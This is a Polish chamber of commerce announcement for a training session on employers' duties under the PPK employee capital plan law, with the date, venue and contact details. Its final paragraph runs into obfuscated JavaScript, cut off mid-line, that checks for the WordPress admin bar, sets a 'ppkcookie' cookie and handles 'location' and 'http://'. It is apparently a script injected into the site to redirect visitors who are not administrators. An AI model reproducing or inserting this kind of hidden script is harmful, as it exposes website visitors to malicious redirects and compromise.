PPK – na jakie obowiązki powinni przygotować się pracodawcy? Spotkanie informacyjne. | Północna Izba Gospodarcza w Koszalinie

W dniu 19 listopada 2018 roku Prezydent podpisał ustawę o Pracowniczych Planach Kapitałowych. Wkrótce obowiązkiem każdego z pracodawców będzie zaproponowanie swoim pracownikom możliwości grupowego oszczędzania w ramach III filara systemu emerytalnego.

Jak się przygotować na obowiązki z tym związane, na co zwrócić szczególną uwagę i jak wdrożyć PPK w swoim przedsiębiorstwie, na te oraz inne pytania odpowiedzą nasi prelegenci już 12 lutego o godzinie 11 w Park Caffe w Koszalinie, ul. Asnyka 11.

Adresatami szkolenia są osoby pracujące z działach kadr i płac, pracownicy działów księgowości, osoby zarządzające firmami pragnące poznać problematykę Pracowniczych Planów Kapitałowych (PPK).

Szkolenie odpowiadające na pytanie: Po co jest PPK i jaką rolę ma spełniać Pracowniczy Plan Kapitałowy?

W czasie spotkania przedstawione zostaną informacje m.in.:

  • Czym są PPK?
  • PPK od strony pracodawcy – jak założyć, obowiązki, budżetowanie.
  • Na co zwrócić uwagę wybierając plan PPK?
  • PPK od strony pracownika – po co pracownikowi PPK? Jakie szanse daje pracownikom przed emeryturą?

Zadbaj o bezpieczną przyszłość firmy i pracowników!

Zapraszamy na szkolenie!

Potwierdzenie obecności prosimy wysyłać na adres koszalin@izba.info lub telefonicznie do naszego biura 94 341 10 83. 

Jeżeli nie odpowiadają Państwu ustalone godziny, bardzo prosimy o informację. 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m